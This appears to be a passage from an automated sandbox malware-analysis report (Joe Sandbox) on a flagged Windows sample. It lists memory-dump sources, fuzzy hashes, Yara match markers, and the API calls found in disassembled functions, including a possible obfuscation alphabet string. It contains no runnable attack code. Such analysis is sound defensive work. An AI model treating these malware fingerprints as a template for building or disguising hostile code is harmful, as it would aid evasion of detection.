                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6002a79847606ed165f940bb2108498281422cc60d23d248e48a1cd4fa4e5092
                                          • Instruction ID: 2bc5ae3ff0136d7aedf41370338760c927097bc741a145edbb4b639e3584b7e4
                                          • Opcode Fuzzy Hash: 6002a79847606ed165f940bb2108498281422cc60d23d248e48a1cd4fa4e5092
                                          • Instruction Fuzzy Hash: 0321C271608205EFCB28AF75A84582B7BB9EF44364710851AF816CB350F738EC20C7A1
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 007E3226
                                            • Part of subcall function 007E1EBD: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,007DEF8D,?,00000000,-00000008), ref: 007E1F1E
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007E325E
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007E327E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 158306478-0
                                          • Opcode ID: b71e71b7c86f80c93c2661c6bce595c2fd8ca9912b6d2014ea10d4f4304c18a7
                                          • Instruction ID: 1d3c65a56a80d1b7c388f11240d07d934433fd34e18635fcb08ebde848dd7f4c
                                          • Opcode Fuzzy Hash: b71e71b7c86f80c93c2661c6bce595c2fd8ca9912b6d2014ea10d4f4304c18a7
                                          • Instruction Fuzzy Hash: FE11A1F2503699BFAB1127B65CCECFF29ACFE8D3A47100515FA42D6200EA3C8E019575
                                          APIs
                                          • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,007E6B6B,00000000,00000001,0000000C,00000000,?,007DF889,00000000,00000000,00000000), ref: 007E7C52
                                          • GetLastError.KERNEL32(?,007E6B6B,00000000,00000001,0000000C,00000000,?,007DF889,00000000,00000000,00000000,00000000,00000000,?,007DFE2C,?), ref: 007E7C5E
                                            • Part of subcall function 007E7C24: CloseHandle.KERNEL32(FFFFFFFE,007E7C6E,?,007E6B6B,00000000,00000001,0000000C,00000000,?,007DF889,00000000,00000000,00000000,00000000,00000000), ref: 007E7C34
                                          • ___initconout.LIBCMT ref: 007E7C6E
                                            • Part of subcall function 007E7BE6: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,007E7C15,007E6B58,00000000,?,007DF889,00000000,00000000,00000000,00000000), ref: 007E7BF9
                                          • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,007E6B6B,00000000,00000001,0000000C,00000000,?,007DF889,00000000,00000000,00000000,00000000), ref: 007E7C83
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: 505b1082487d1278143d8348c059244a86cb5a61ceb3cb46d580e4daba7a5e0f
                                          • Instruction ID: 8ddd2281b9ea353bebd65d1b11158a6918cd4930f4ca0f56ac88c0b1256b91fc
                                          • Opcode Fuzzy Hash: 505b1082487d1278143d8348c059244a86cb5a61ceb3cb46d580e4daba7a5e0f
                                          • Instruction Fuzzy Hash: BCF01C36506199BBCF221FD6DC089D93F2AEB0C3A0F158050FA0989230C636D820DBA5
                                          APIs
                                            • Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
                                            • Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
                                            • Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
                                            • Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000005,00000000,00000000), ref: 038F2E3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalHeapSection$AllocateByteCharEnterLeaveMultiProcessWide
                                          • String ID: x
                                          • API String ID: 1990697408-2363233923
                                          • Opcode ID: d0d08d0a6213261475b73a9d855fee5cb7dc0bf319ef6e20379dba9fc9edc9fe
                                          • Instruction ID: d46758475965bc4bf30553be4e129f12149e8fae221f150b9c332da982b39c79
                                          • Opcode Fuzzy Hash: d0d08d0a6213261475b73a9d855fee5cb7dc0bf319ef6e20379dba9fc9edc9fe
                                          • Instruction Fuzzy Hash: 2802BC78A0424DEFCF15DF98C884AADBBF0FF09314F148895E955EB250D370AA91CB61
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 007DBC8D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__start
                                          • String ID: pow
                                          • API String ID: 3213639722-2276729525
                                          • Opcode ID: fde7a5f00e8798b2a21717d28d342c945b409566a8899f5d0c48ad9fdeb01a75
                                          • Instruction ID: 453b6847f9e0dad7f745b2a05bf89cc6212651ada960045ad3d8a5c4dc49c5f0
                                          • Opcode Fuzzy Hash: fde7a5f00e8798b2a21717d28d342c945b409566a8899f5d0c48ad9fdeb01a75
                                          • Instruction Fuzzy Hash: 1F517C61A25102D6CB137714CD8137A3BB4EB40B40F308D5BE48E863A9EF3D8CD5EA69
                                          APIs
                                          • EncodePointer.KERNEL32(00000000,?), ref: 007D36AB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: EncodePointer
                                          • String ID: MOC$RCC
                                          • API String ID: 2118026453-2084237596
                                          • Opcode ID: 9c3f9d686148fbfa2a411350bbf76df5c0e35e8edac277c25a826092ee97fa25
                                          • Instruction ID: 2e3dd234be821ffc85f94be1312d60c831fa1c1a1386b9a86bd1c3b91c9bd3ee
                                          • Opcode Fuzzy Hash: 9c3f9d686148fbfa2a411350bbf76df5c0e35e8edac277c25a826092ee97fa25
                                          • Instruction Fuzzy Hash: 7D4137B1900209AFCF15DF98CD85AEEBBB5BF48310F18815AF90466312D339AA51DB62
                                          APIs
                                          • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 007CC9E8
                                          • task.LIBCPMTD ref: 007CC9F6
                                          Strings
                                          • }{cdef~hijkl/nopqrstuvwx|><B-DEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+, xrefs: 007CC92A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                          • Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd
                                          Similarity
                                          • API ID: Concurrency::task_continuation_context::task_continuation_contexttask
                                          • String ID: }{cdef~hijkl/nopqrstuvwx|><B-DEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+
                                          • API String ID: 605201214-2946796713
                                          • Opcode ID: 5aa8511f78a2c6477dd75bfb29c580a9eea7331b1e842b3e8cc29488cf5c6ad2
                                          • Instruction ID: 9f1c76ec20c58bc2dcf7b171a6fded9b301535aeb7691370b42f4e66e0ea88c3
                                          • Opcode Fuzzy Hash: 5aa8511f78a2c6477dd75bfb29c580a9eea7331b1e842b3e8cc29488cf5c6ad2
                                          • Instruction Fuzzy Hash: 5B31F571D04119DBCB05DF98C956BEEBBB1FF48300F20815DE419BB291DB786A00CBA1